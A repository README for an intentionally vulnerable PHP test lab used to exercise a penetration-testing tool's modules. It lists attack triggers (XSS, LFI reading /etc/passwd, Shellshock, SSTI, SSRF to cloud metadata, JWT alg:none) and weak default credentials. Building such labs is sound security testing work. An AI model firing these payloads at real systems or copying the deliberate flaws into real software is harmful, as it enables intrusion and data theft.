fdciabdul/PocketPentester
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
27381d4e3755d3cc31588e5e21ae9285fea4a10a
PocketPentester/vuln-lab
History
taqin 27381d4e37 dsad
2026-04-19 21:10:40 +07:00
..
db
dsad
2026-04-19 21:10:40 +07:00
web
dsad
2026-04-19 21:10:40 +07:00
docker-compose.yml
dsad
2026-04-19 21:10:40 +07:00
README.md
dsad
2026-04-19 21:10:40 +07:00

README.md

insecure.newploit.com — PocketPentester Vuln Lab

Deliberately vulnerable PHP target for shaking down every arsenal module in PocketPentester. Runs as a local docker-compose stack.

Warning

Do NOT expose this to the public internet. It has intentional RCE, SQLi, LFI, SSRF, open redirect, CORS misconfig, weak JWT, leaked secrets and more. Keep it on a private bridge network only.

Quick start

cd vuln-lab
docker compose up --build -d

Add the hostname to your hosts file so the insecure.newploit.com SNI / Host header works:

Linux / macOS/etc/hosts

127.0.0.1   insecure.newploit.com

WindowsC:\Windows\System32\drivers\etc\hosts

127.0.0.1   insecure.newploit.com

Android (testing from PocketPentester on device) — set your phone's Wi-Fi DNS to the dev machine, or just use the host's LAN IP directly:

http://192.168.x.x/              (or whatever your dev box IP is)

Smoke-test from the host:

curl http://insecure.newploit.com/
curl http://insecure.newploit.com/.env
curl "http://insecure.newploit.com/search.php?q=<svg/onload=alert(1)>"

Open ports

Port Service Notes
80 Apache 2.4 + PHP main web app
443 Apache TLS snakeoil cert for ssl_scan
3306 MariaDB 10.11 root:toor, also dbuser:dbpass123
21 vsftpd anonymous:anonymous

Module → endpoint map

Everything below is already wired. Point the tool at insecure.newploit.com (or http://<host>) and it should fire.

RECON

Arsenal module Where it hits
port_scan 21 / 80 / 443 / 3306 open
httpx Title Newploit :: insecure test lab, Server Apache/2.4.57 …
banner Apache + MySQL banners expose full version
ssl_scan Self-signed CN=insecure.newploit.com on :443
dns_tools (local hosts entry)

EXPLOIT

Arsenal module Endpoint(s) that fire
sqli /search.php?q=…, /profile.php?id=…, /login.php POST
xss /search.php?q=<payload> (reflected, unescaped)
jwt /api/auth.phpalg:none accepted, HS256 secret = secret
xploiter see template-by-template table below
autopwn runs the whole chain on http://insecure.newploit.com/

MANUAL

| repeater | any of the URLs above — try ?q= with crafted payloads | | dirfuzz | common wordlist hits /admin, /wp-admin, /backup.sql, … | | admin_finder | /admin/, /administrator/, /wp-admin/, /wp-login.php | | form_brute | POST /login.phpadmin:admin123, root:toor, … |

UTILITY

| domain_grabber | not relevant to a single host | | subdomain | not relevant to a single host (add wildcard DNS if desired) | | takeover | not relevant | | lan_map | scan your local net and this container IP will show up |

Xploiter bundled templates

Template YAML Vuln endpoint Trigger
xpl-env-leak /.env, .env.local, .env.production APP_KEY=, DB_PASSWORD=
xpl-git-config /.git/config [core] + remote URL
xpl-phpinfo /phpinfo.php <title>phpinfo()
xpl-lfi-basic /page.php?page=… ../../../../etc/passwd
xpl-rce-shellshock /cgi-bin/test.cgi etc () { :; }; echo marker
xpl-ssti-jinja2 /?name=xplZZZ{{999*777}}ssti math eval inside {{ }}
xpl-ssti-twig POST / body=name=…{{'x'|upper}}… filter pipe eval
xpl-open-redirect /redirect.php?url=, /go.php?to=, … Location: evil.example
xpl-ssrf-basic /fetch.php?url=…169.254.169.254/… canned AWS metadata reply
xpl-wp-debug /wp-content/debug.log PHP error lines
xpl-cors-misconfig / and /api/* Origin reflection + creds
xpl-backup-files /backup.sql, /backup.zip, /db.sql, … >512B, non-HTML ctype
xpl-rce-log4shell (not applicable — no JVM) won't fire

Creds cheatsheet (for form_brute / sqli bypass testing)

admin     / admin123
root      / toor
user      / password
test      / test
imtaqin   / newploit2024
guest     / guest

Also in the DB: api_tokens.token column has sk_* values matching the ones in /.env so the leak-correlation story is consistent.

Layout

vuln-lab/
├── docker-compose.yml
├── db/init.sql
└── web/
    ├── Dockerfile
    ├── apache.conf
    ├── cgi-bin/         # shellshock targets
    └── www/
        ├── index.php    # landing + SSTI + CORS
        ├── search.php   # XSS + SQLi
        ├── profile.php  # integer SQLi
        ├── login.php    # SQLi login + form_brute target
        ├── page.php     # LFI
        ├── fetch.php    # SSRF (reflects AWS metadata)
        ├── redirect.php # open redirect
        ├── api/         # JWT + CORS endpoints
        ├── admin/       # admin panel
        ├── wp-login.php # wordpress decoy
        ├── wp-content/debug.log
        ├── .env, .env.local, .env.production
        ├── .git/config, .git/HEAD
        ├── .bash_history, .DS_Store
        ├── backup.sql, backup.zip, backup.tar.gz
        ├── db.sql, dump.sql, site.zip, www.zip, public_html.zip
        └── robots.txt

Teardown

docker compose down -v

Built for PocketPentester by imtaqin / tegalsec. Have fun. Don't ship this.

Reference in New Issue View Git Blame Copy Permalink